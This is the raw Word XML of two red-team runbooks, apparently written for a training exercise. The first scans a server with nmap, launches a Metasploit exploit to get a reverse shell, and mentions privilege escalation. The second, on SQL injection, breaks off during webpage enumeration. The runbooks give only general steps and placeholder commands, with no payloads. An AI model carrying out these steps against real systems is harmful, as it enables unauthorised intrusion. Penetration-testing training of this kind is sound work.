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0000"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>Runbook 1</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="96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5"/>
        <w:gridCol w:w="497"/>
        <w:gridCol w:w="2290"/>
        <w:gridCol w:w="2290"/>
        <w:gridCol w:w="1760"/>
        <w:gridCol w:w="1282"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="497"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Document Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>IRTx Red Run 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290"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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="304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V1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="417"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Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Dylan Wondal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290"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Date Created</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="304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11/9/23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="411"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Attack Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Vulnerable services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290"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Last Modified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="304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11/9/23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="411"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Staff Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>1 Attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290"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Skills Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="304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Nmap, Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1834" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1525"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 xml:space="preserve">Document </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8119" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">This document is to scan a server and find vulnerable services to later be exploited with metasploit </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="395"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Step 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282"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Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1735" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="202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Scanning/Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">Perform an aggressive Nmap scan and enumerate all open ports and their headers to determine if there is the vulnerable service. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Look for things like ftp, smb, jenkins installs etc.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>nmap -sC -sV -oN init.scan $IP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="395"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Step 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282"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Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1837" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="202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Prepare Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">Run the MSFconsole and select the exploit for the vulnerable service </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>(if the module doesn’t work, try the exploit manually)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>u</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>se exploit name</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>set targets – ip and port</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="395"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Step 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282"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Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1716" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="202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Execute Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Execute the payload and wait to receive the reverse shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="395"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Step 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282"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Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1718" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="202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Connect to shell and have root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b w:val="false"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:kern w:val="0"/>
                <w:highlight w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:kern w:val="0"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>The shell should automatically connect and you should have access. Priv Esc if needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>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shd w:val="clear" w:color="auto" w:fill="FF0000"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>Runbook 2</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="96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5"/>
        <w:gridCol w:w="497"/>
        <w:gridCol w:w="2290"/>
        <w:gridCol w:w="2290"/>
        <w:gridCol w:w="1760"/>
        <w:gridCol w:w="1282"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="497"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Document Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>IRTx Red Run 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290"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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="304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V1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="417"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Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Dylan Wondal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290"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Date Created</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="304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11/9/23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="411"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Attack Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290"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Last Modified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="304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11/9/23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="411"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Staff Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>1 Attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290"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Skills Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="304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Nmap, SQLi, Web, Gobuster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1834" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1525"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 xml:space="preserve">Document </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8119" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>This document is to scan and attack a server that may have a vulnerable web page/login with SQL injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="395"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Step 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282"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Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1735" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="202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Scanning/Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Perform an aggressive Nmap scan and enumerate all open ports and their headers to determine if there is a web service running</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>nmap -sC -sV -oN init.scan $IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="395"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Step 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282"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Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1837" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="202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Webpage enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
